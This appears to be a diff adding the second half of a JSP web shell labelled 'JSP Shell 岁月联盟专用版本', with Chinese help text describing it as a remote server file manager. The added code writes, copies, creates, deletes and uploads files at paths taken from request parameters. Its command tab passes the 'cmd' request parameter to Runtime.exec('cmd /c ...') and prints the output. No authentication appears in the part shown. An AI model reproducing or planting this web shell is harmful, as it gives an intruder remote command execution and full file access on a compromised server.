+if(strAction!=null && strAction.equals("save"))
+{
+ File f=new File(strPath);
+ BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f)));
+ String strContent=request.getParameter("content");
+ bw.write(strContent);
+ bw.close();
+}
+if(strAction!=null && strAction.equals("copy"))
+{
+ File f=new File(strPath);
+ sbCopy.append("<br><form name='frmCopy' action='' method='POST'>\r\n");
+ sbCopy.append("<input type=hidden name=action value=savecopy >\r\n");
+ sbCopy.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
+ sbCopy.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
+ sbCopy.append("原始文件： "+strPath+"<p>");
+ sbCopy.append("目标文件： <input type=text name=file2 size=40 value='"+strDir+"'><p>");
+ sbCopy.append("<input type=submit name=save value=' "+strFileCopy[languageNo]+" '> ");
+ sbCopy.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> <p>&nbsp;\r\n");
+ sbCopy.append("</form>");
+}
+if(strAction!=null && strAction.equals("savecopy"))
+{
+ File f=new File(strPath);
+ String strDesFile=request.getParameter("file2");
+ if(strDesFile==null || strDesFile.equals(""))
+ {
+  sbSaveCopy.append("<p><font color=red>目标文件错误。</font>");
+ }
+ else
+ {
+  File f_des=new File(strDesFile);
+  if(f_des.isFile())
+  {
+   sbSaveCopy.append("<p><font color=red>目标文件已存在,不能复制。</font>");
+  }
+  else
+  {
+   String strTmpFile=strDesFile;
+   if(f_des.isDirectory())
+   {
+    if(!strDesFile.endsWith("\\"))
+    {
+     strDesFile=strDesFile+"\\";
+    }
+    strTmpFile=strDesFile+"cqq_"+strFile;
+    }
+   
+   File f_des_copy=new File(strTmpFile);
+   FileInputStream in1=new FileInputStream(f);
+   FileOutputStream out1=new FileOutputStream(f_des_copy);
+   byte[] buffer=new byte[1024];
+   int c;
+   while((c=in1.read(buffer))!=-1)
+   {
+    out1.write(buffer,0,c);
+   }
+   in1.close();
+   out1.close();
+ 
+   sbSaveCopy.append("原始文件 ："+strPath+"<p>");
+   sbSaveCopy.append("目标文件 ："+strTmpFile+"<p>");
+   sbSaveCopy.append("<font color=red>复制成功！</font>");   
+  }  
+ } 
+ sbSaveCopy.append("<p><input type=button name=saveCopyBack onclick='history.back(-2);' value=返回>");
+}
+if(strAction!=null && strAction.equals("newFile"))
+{
+ String strF=request.getParameter("fileName");
+ String strType1=request.getParameter("btnNewFile");
+ String strType2=request.getParameter("btnNewDir");
+ String strType="";
+ if(strType1==null)
+ {
+  strType="Dir";
+ }
+ else if(strType2==null)
+ {
+  strType="File";
+ }
+ if(!strType.equals("") && !(strF==null || strF.equals("")))
+ {  
+   File f_new=new File(strF);   
+   if(strType.equals("File") && !f_new.createNewFile())
+    sbNewFile.append(strF+" 文件创建失败");
+   if(strType.equals("Dir") && !f_new.mkdirs())
+    sbNewFile.append(strF+" 目录创建失败");
+ }
+ else
+ {
+  sbNewFile.append("<p><font color=red>建立文件或目录出错。</font>");
+ }
+}
+
+if((request.getContentType()!= null) && (request.getContentType().toLowerCase().startsWith("multipart")))
+{
+ String tempdir=".";
+ boolean error=false;
+ response.setContentType("text/html");
+ sbNewFile.append("<p><font color=red>建立文件或目录出错。</font>");
+ HttpMultiPartParser parser = new HttpMultiPartParser();
+
+ int bstart = request.getContentType().lastIndexOf("oundary=");
+ String bound = request.getContentType().substring(bstart + 8);
+ int clength = request.getContentLength();
+ Hashtable ht = parser.processData(request.getInputStream(), bound, tempdir, clength);
+ if (ht.get("cqqUploadFile") != null)
+ {
+
+  FileInfo fi = (FileInfo) ht.get("cqqUploadFile");
+  File f1 = fi.file;
+  UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
+  if (info != null && info.aborted) 
+  {
+   f1.delete();
+   request.setAttribute("error", "Upload aborted");
+  }
+  else 
+  {
+   String path = (String) ht.get("path");
+   if(path!=null && !path.endsWith("\\")) 
+    path = path + "\\";
+   if (!f1.renameTo(new File(path + f1.getName()))) 
+   {
+    request.setAttribute("error", "Cannot upload file.");
+    error = true;
+    f1.delete();
+   }
+  }
+ }
+}
+%>
+<html>
+<head>
+<style type="text/css">
+td,select,input,body{font-size:9pt;}
+A { TEXT-DECORATION: none }
+
+#tablist{
+padding: 5px 0;
+margin-left: 0;
+margin-bottom: 0;
+margin-top: 0.1em;
+font:9pt;
+}
+
+#tablist li{
+list-style: none;
+display: inline;
+margin: 0;
+}
+
+#tablist li a{
+padding: 3px 0.5em;
+margin-left: 3px;
+border: 1px solid ;
+background: F6F6F6;
+}
+
+#tablist li a:link, #tablist li a:visited{
+color: navy;
+}
+
+#tablist li a.current{
+background: #EAEAFF;
+}
+
+#tabcontentcontainer{
+width: 100%;
+padding: 5px;
+border: 1px solid black;
+}
+
+.tabcontent{
+display:none;
+}
+
+</style>
+
+<script type="text/javascript">
+
+var initialtab=[<%=tabID%>, "menu<%=tabID%>"]
+
+////////Stop editting////////////////
+
+function cascadedstyle(el, cssproperty, csspropertyNS){
+if (el.currentStyle)
+return el.currentStyle[cssproperty]
+else if (window.getComputedStyle){
+var elstyle=window.getComputedStyle(el, "")
+return elstyle.getPropertyValue(csspropertyNS)
+}
+}
+
+var previoustab=""
+
+function expandcontent(cid, aobject){
+if (document.getElementById){
+highlighttab(aobject)
+if (previoustab!="")
+document.getElementById(previoustab).style.display="none"
+document.getElementById(cid).style.display="block"
+previoustab=cid
+if (aobject.blur)
+aobject.blur()
+return false
+}
+else
+return true
+}
+
+function highlighttab(aobject){
+if (typeof tabobjlinks=="undefined")
+collecttablinks()
+for (i=0; i<tabobjlinks.length; i++)
+tabobjlinks[i].style.backgroundColor=initTabcolor
+var themecolor=aobject.getAttribute("theme")? aobject.getAttribute("theme") : initTabpostcolor
+aobject.style.backgroundColor=document.getElementById("tabcontentcontainer").style.backgroundColor=themecolor
+}
+
+function collecttablinks(){
+var tabobj=document.getElementById("tablist")
+tabobjlinks=tabobj.getElementsByTagName("A")
+}
+
+function do_onload(){
+collecttablinks()
+initTabcolor=cascadedstyle(tabobjlinks[1], "backgroundColor", "background-color")
+initTabpostcolor=cascadedstyle(tabobjlinks[0], "backgroundColor", "background-color")
+expandcontent(initialtab[1], tabobjlinks[initialtab[0]-1])
+}
+
+if (window.addEventListener)
+window.addEventListener("load", do_onload, false)
+else if (window.attachEvent)
+window.attachEvent("onload", do_onload)
+else if (document.getElementById)
+window.onload=do_onload
+
+ 
+
+</script>
+<script language="javascript">
+
+function doForm(action,path,file,cmd,tab,content)
+{
+ document.frmCqq.action.value=action;
+ document.frmCqq.path.value=path;
+ document.frmCqq.file.value=file;
+ document.frmCqq.cmd.value=cmd;
+ document.frmCqq.tabID.value=tab;
+ document.frmCqq.content.value=content;
+ if(action=="del")
+ {
+  if(confirm("确定要删除文件 "+file+" 吗？"))
+  document.frmCqq.submit();
+ }
+ else
+ {
+  document.frmCqq.submit();    
+ }
+}
+</script>
+
+<title>JSP Shell 岁月联盟专用版本</title>
+<head>
+
+
+<body>
+
+<form name="frmCqq" method="post" action="">
+<input type="hidden" name="action" value="">
+<input type="hidden" name="path" value="">
+<input type="hidden" name="file" value="">
+<input type="hidden" name="cmd" value="">
+<input type="hidden" name="tabID" value="2">
+<input type="hidden" name="content" value="">
+</form>
+
+<!--Top Menu Started-->
+<ul id="tablist">
+<li><a href="http://www.smallrain.net" class="current" onClick="return expandcontent('menu1', this)"> <%=strFileManage[languageNo]%> </a></li>
+<li><a href="new.htm" onClick="return expandcontent('menu2', this)" theme="#EAEAFF"> <%=strCommand[languageNo]%> </a></li>
+<li><a href="hot.htm" onClick="return expandcontent('menu3', this)" theme="#EAEAFF"> <%=strSysProperty[languageNo]%> </a></li>
+<li><a href="search.htm" onClick="return expandcontent('menu4', this)" theme="#EAEAFF"> <%=strHelp[languageNo]%> </a></li>
+ &nbsp; <%=authorInfo[languageNo]%>
+</ul>
+<!--Top Menu End-->
+
+
+<%
+StringBuffer sbFolder=new StringBuffer("");
+StringBuffer sbFile=new StringBuffer("");
+try
+{
+ File objFile = new File(strDir);
+ File list[] = objFile.listFiles(); 
+ if(objFile.getAbsolutePath().length()>3)
+ {
+  sbFolder.append("<tr><td >&nbsp;</td><td><a href=\"javascript:doForm('','"+formatPath(objFile.getParentFile().getAbsolutePath())+"','','"+strCmd+"','1','');\">");
+  sbFolder.append(strParentFolder[languageNo]+"</a><br>- - - - - - - - - - - </td></tr>\r\n ");
+
+
+ }
+ for(int i=0;i<list.length;i++)
+ {
+  if(list[i].isDirectory())
+  {
+   sbFolder.append("<tr><td >&nbsp;</td><td>");
+   sbFolder.append("  <a href=\"javascript:doForm('','"+formatPath(list[i].getAbsolutePath())+"','','"+strCmd+"','1','');\">");
+   sbFolder.append(list[i].getName()+"</a><br></td></tr> ");
+  }
+  else
+  {
+      String strLen="";
+   String strDT="";
+   long lFile=0;
+   lFile=list[i].length();
+   strLen = convertFileSize(lFile);
+   Date dt=new Date(list[i].lastModified());
+   strDT=dt.toLocaleString();
+   sbFile.append("<tr onmouseover=\"this.style.backgroundColor='#FBFFC6'\" onmouseout=\"this.style.backgroundColor='white'\"><td>");
+   sbFile.append(""+list[i].getName()); 
+   sbFile.append("</td><td>");
+   sbFile.append(""+strLen);
+   sbFile.append("</td><td>");
+   sbFile.append(""+strDT);
+   sbFile.append("</td><td>");
+
+   sbFile.append(" &nbsp;<a href=\"javascript:doForm('edit','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
+   sbFile.append(strFileEdit[languageNo]+"</a> ");
+
+   sbFile.append(" &nbsp;<a href=\"javascript:doForm('del','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
+   sbFile.append(strFileDel[languageNo]+"</a> ");
+
+   sbFile.append("  &nbsp;<a href=\"javascript:doForm('down','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
+   sbFile.append(strFileDown[languageNo]+"</a> ");
+
+   sbFile.append("  &nbsp;<a href=\"javascript:doForm('copy','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
+   sbFile.append(strFileCopy[languageNo]+"</a> ");
+  }  
+
+ } 
+}
+catch(Exception e)
+{
+ out.println("<font color=red>操作失败： "+e.toString()+"</font>");
+}
+%>
+
+<DIV id="tabcontentcontainer">
+
+
+<div id="menu3" class="tabcontent">
+<br> 
+<br> &nbsp;&nbsp; 未完成
+<br> 
+<br>&nbsp;
+
+</div>
+
+<div id="menu4" class="tabcontent">
+<br>
+<p>一、功能说明</p>
+<p>&nbsp;&nbsp;&nbsp; jsp 版本的文件管理器，通过该程序可以远程管理服务器上的文件系统，您可以新建、修改、</p>
+<p>删除、下载文件和目录。对于windows系统，还提供了命令行窗口的功能，可以运行一些程序，类似</p>
+<p>与windows的cmd。</p>
+<p>&nbsp;</p>
+<p>二、测试</p>
+<p>&nbsp;&nbsp;&nbsp;<b>请大家在使用过程中，有任何问题，意见或者建议都可以给我留言，以便使这个程序更加完善和稳定，<p>
+留言地址为：<a href="http://bbs.syue.com/" target="_blank">http://bbs.syue.com/</a></b>
+<p>&nbsp;</p>
+<p>三、更新记录</p>
+<p>&nbsp;&nbsp;&nbsp; 2004.11.15&nbsp; V0.9测试版发布，增加了一些基本的功能，文件编辑、复制、删除、下载、上传以及新建文件目录功能</p>
+<p>&nbsp;&nbsp;&nbsp; 2004.10.27&nbsp; 暂时定为0.6版吧， 提供了目录文件浏览功能 和 cmd功能</p>
+<p>&nbsp;&nbsp;&nbsp; 2004.09.20&nbsp; 第一个jsp&nbsp;程序就是这个简单的显示目录文件的小程序</p>
+<p>&nbsp;</p>
+<p>&nbsp;</p>
+</div>
+
+
+<div id="menu1" class="tabcontent">
+<%
+out.println("<table border='1' width='100%' bgcolor='#FBFFC6' cellspacing=0 cellpadding=5 bordercolorlight=#000000 bordercolordark=#FFFFFF><tr><td width='30%'>"+strCurrentFolder[languageNo]+"： <b>"+strDir+"</b></td><td>" + getDrivers() + "</td></tr></table><br>\r\n");
+%>
+<table width="100%" border="1" cellspacing="0" cellpadding="5" bordercolorlight="#000000" bordercolordark="#FFFFFF">
+       
+        <tr> 
+          <td width="25%" align="center" valign="top"> 
+              <table width="98%" border="0" cellspacing="0" cellpadding="3">
+     <%=sbFolder%>
+                </tr>                 
+              </table>
+          </td>
+          <td width="81%" align="left" valign="top">
+ 
+ <%
+ if(strAction!=null && strAction.equals("edit"))
+ {
+  out.println(sbEdit.toString());
+ }
+ else if(strAction!=null && strAction.equals("copy"))
+ {
+  out.println(sbCopy.toString());
+ }
+ else if(strAction!=null && strAction.equals("down"))
+ {
+  out.println(sbDown.toString());
+ }
+ else if(strAction!=null && strAction.equals("savecopy"))
+ {
+  out.println(sbSaveCopy.toString());
+ }
+ else if(strAction!=null && strAction.equals("newFile") && !sbNewFile.toString().equals(""))
+ {
+  out.println(sbNewFile.toString());
+ }
+ else
+ {
+ %>
+  <span id="EditBox"><table width="98%" border="1" cellspacing="1" cellpadding="4" bordercolorlight="#cccccc" bordercolordark="#FFFFFF" bgcolor="white" >
+              <tr bgcolor="#E7e7e6"> 
+                <td width="26%"><%=strFileName[languageNo]%></td>
+                <td width="19%"><%=strFileSize[languageNo]%></td>
+                <td width="29%"><%=strLastModified[languageNo]%></td>
+                <td width="26%"><%=strFileOperation[languageNo]%></td>
+              </tr>              
+            <%=sbFile%>
+             <!-- <tr align="center"> 
+                <td colspan="4"><br>
+                  总计文件个数：<font color="#FF0000">30</font> ，大小：<font color="#FF0000">664.9</font> 
+                  KB </td>
+              </tr>
+    -->
+            </table>
+   </span>
+ <%
+ }  
+ %>
+
+          </td>
+        </tr>
+
+ <form name="frmMake" action="" method="post">
+ <tr><td colspan=2 bgcolor=#FBFFC6>
+ <input type="hidden" name="action" value="newFile">
+ <input type="hidden" name="path" value="<%=strDir%>">
+ <input type="hidden" name="file" value="<%=strFile%>">
+ <input type="hidden" name="cmd" value="<%=strCmd%>">
+ <input type="hidden" name="tabID" value="1">
+ <input type="hidden" name="content" value="">
+ <%
+ if(!strDir.endsWith("\\"))
+ strDir = strDir + "\\";
+ %>
+ <input type="text" name="fileName" size=36 value="<%=strDir%>">
+ <input type="submit" name="btnNewFile" value="新建文件" onclick="frmMake.submit()" > 
+ <input type="submit" name="btnNewDir" value="新建目录"  onclick="frmMake.submit()" > 
+ </form>  
+ <form name="frmUpload" enctype="multipart/form-data" action="" method="post">
+ <input type="hidden" name="action" value="upload">
+ <input type="hidden" name="path" value="<%=strDir%>">
+ <input type="hidden" name="file" value="<%=strFile%>">
+ <input type="hidden" name="cmd" value="<%=strCmd%>">
+ <input type="hidden" name="tabID" value="1">
+ <input type="hidden" name="content" value="">
+ <input type="file" name="cqqUploadFile" size="36">
+ <input type="submit" name="submit" value="上传">
+ </td></tr></form>
+      </table>
+</div>
+<div id="menu2" class="tabcontent">
+
+<%
+String line="";
+StringBuffer sbCmd=new StringBuffer("");
+
+if(strCmd!=null) 
+{
+ try
+ {
+  //out.println(strCmd);
+  Process p=Runtime.getRuntime().exec("cmd /c "+strCmd);
+  BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
+  while((line=br.readLine())!=null)
+  {
+   sbCmd.append(line+"\r\n");  
+  }    
+ }
+ catch(Exception e)
+ {
+  System.out.println(e.toString());
+ }
+}
+else
+{
+ strCmd = "set";
+}
+
+%>
+<form name="cmd" action="" method="post">
+&nbsp;
+<input type="text" name="cmd" value="<%=strCmd%>" size=50>
+<input type="hidden" name="tabID" value="2">
+<input type=submit name=submit value="<%=strExecute[languageNo]%>">
+</form>
+<%
+if(sbCmd!=null && sbCmd.toString().trim().equals("")==false)
+{
+%>
+&nbsp;<TEXTAREA NAME="cqq" ROWS="20" COLS="100%"><%=sbCmd.toString()%></TEXTAREA>
+<br>&nbsp;
+<%
+}
+%>
+</DIV>
+</div>
+<br><br>
+<center><a href="http://www.syue.com" target="_blank">岁月</a> 
+<br>